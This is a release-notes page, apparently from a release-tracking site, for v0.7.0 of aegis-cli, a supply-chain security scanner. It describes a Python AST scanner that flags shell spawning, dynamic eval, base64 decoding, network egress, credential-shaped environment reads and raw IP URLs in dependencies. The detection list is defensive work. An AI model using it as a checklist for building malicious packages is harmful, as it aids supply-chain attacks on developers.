Skip to content

qwexvf/aegis-cli

v0.7.0 Feature

This release adds 2 notable features for engineering teams evaluating rollout.

Published 1mo CLI & Terminal
✓ No known CVEs patched
Read the diff → Tool health → What is this tool? →

✓ No known CVEs patched in this version

Topics

ast-analysis cli cve dependency-scanner security go
+13 more
lockfile malware-detection npm-security osv python-security sbom sca shai-hulud supply-chain-attack supply-chain-security tree-sitter typosquatting vulnerability-scanning

Affected surfaces

deps rce_ssrf

Summary

AI summary

Added a Python AST scanner for capability detection and an advisory column in aegis snapshot show.

Full changelog

aegis-cli v0.7.0

Supply-chain security CLI for npm / bun / yarn / pnpm.

Verifying releases

All artifacts are checksummed (checksums.txt) and the checksums file
is signed via cosign keyless OIDC. To verify:

cosign verify-blob \
  --certificate-identity-regexp 'https://github.com/qwexvf/aegis-cli/.github/workflows/release.yml.*' \
  --certificate-oidc-issuer 'https://token.actions.githubusercontent.com' \
  --certificate checksums.txt.pem \
  --signature   checksums.txt.sig \
  checksums.txt
sha256sum -c checksums.txt

SLSA build provenance is attached to every artifact and can be
verified with gh attestation verify <file> --owner qwexvf.

Python AST scanner + curated release notes + advisory column in snapshot show.

Added

  • Python AST scanner (internal/infra/astscan/pyscan/) — tree-sitter-python integration. Detects the same capability set as the JS scanner across PyPI deps:
    • shell-spawn: subprocess.{run,Popen,check_output,check_call,...}, os.{system,popen,exec*,spawn*}, pty.spawn
    • dynamic-eval: eval, exec, compile, __import__
    • base64-decode: base64/codecs/binascii decode functions
    • net-egress: urllib/requests/httpx/aiohttp/socket/http.client
    • env-read: os.environ['X'] / os.environ.get('X') / os.getenv('X') (with credential-shaped name filter)
    • fs-write-outside-root: open(...,'w'/'a'), pathlib.Path.write_*, shutil.copy*/move
    • raw-ip-literal: http(s)://NNN.NNN.NNN.NNN URL strings
  • CHANGELOG-driven release notes — release.yml now extracts the matching CHANGELOG.md section per tag and passes it to goreleaser release --release-notes. Falls back to auto-generated notes when the section is missing. scripts/extract-changelog.sh is the awk-based extractor.
  • aegis snapshot show advisory column — the rendered table now has CAPS (capability count from AST + heuristics) and ADVISORIES (count + max severity, color-coded) columns. Shows existing data that was being collected since v0.2 but not surfaced.

Changed

  • astscan.isAnalyzable recognises .py files for EcoPyPI deps so the dispatcher routes them to pyscan.
  • Composition root (cmd/aegis/risk_engine.go) registers the Python scanner alongside the JS one. Best-effort: if pyscan init fails, the rest of the gate keeps working with a stderr warning.

Tests

  • 662 pass with race detector across 25 packages (+41 from v0.6 — all pyscan).
  • Pyscan tests cover every capability family with a positive + a negative case (benign code does NOT fire).

Coverage status

With v0.7, both JS and Python deps get full AST capability detection in addition to OSV vulnerability lookup and the 7 behavior-based heuristics. Rust / Go / Ruby still get OSV + (some) heuristics, but no AST scanner yet.

Apache-2.0 — see LICENSE.

View diff on GitHub

Weekly OSS security release digest.

The CVE patches and breaking changes that affected production tools this week. One email, every Sunday.

No spam, unsubscribe anytime.

Share this release

Share on X Share on Bluesky

Track qwexvf/aegis-cli

Get notified when new releases ship.

Sign up free

About qwexvf/aegis-cli

All releases →

Related context

Beta — feedback welcome: [email protected]